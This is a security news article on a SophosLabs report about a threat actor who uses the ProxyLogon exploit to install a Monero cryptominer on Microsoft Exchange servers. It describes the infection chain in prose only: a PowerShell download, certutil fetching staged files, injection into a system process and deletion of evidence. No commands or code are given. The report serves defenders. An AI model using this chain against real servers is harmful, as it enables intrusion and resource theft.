Cybercriminals are continuing targeting vulnerable Microsoft exchange servers with a variety of malware ranging from webshells to ransomware and cryptominers. According to a new report from SophosLabs, an unknown threat actor has been attempting to leverage the ProxyLogon exploit to infect Exchange servers with a malicious Monero cryptominer, with the payload being hosted on a compromised Exchange server.

The infection chain starts with a PowerShell command that retrieves a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth). This file is a batch script that invokes the built-into-Windows certutil.exe tool to download two additional files - win_s.zip (written out to the filesystem as QuickCPU.b64) and win_d.zip.

The batch script then runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes the evidence and the miner remains running in the memory.

“Among the files contained in the QuickCPU.dat archive are the configurator for the miner, which appears to be xmr-stak. By default, the payload sets up the miner so that it only can communicate if it can have a secure TLS connection back to the Monero wallet where it will store its value. If the miner detects that there’s a certificate mismatch (or some other indication of a TLS MITM), it quits and attempts to reconnect every 30 seconds,” the researchers said.

According to files the SophosLabs team analyzed, the attacker gave this collection of miners a nickname: “DRUGS.” The researchers also have identified a Monero wallet apparently belonging to the cybercriminals, which began receiving funds on March 9, shortly after Microsoft released patches for the ProxyLogon vulnerabilities.

“As time has gone on, the attacker lost several servers and the cryptomining output decreased, but then gained a few new ones that more than make up for the early losses,” Sophos added.

The US Department of Justice has recently announced that the FBI has conducted a successful operation in which it removed web shells from hundreds of hacked Microsoft Exchange servers. While this is good news, it seems that owners and operators of Microsoft Exchange servers are now facing a new challenge, as Microsoft this week released the patches for another set of four flaws in Microsoft Exchange software.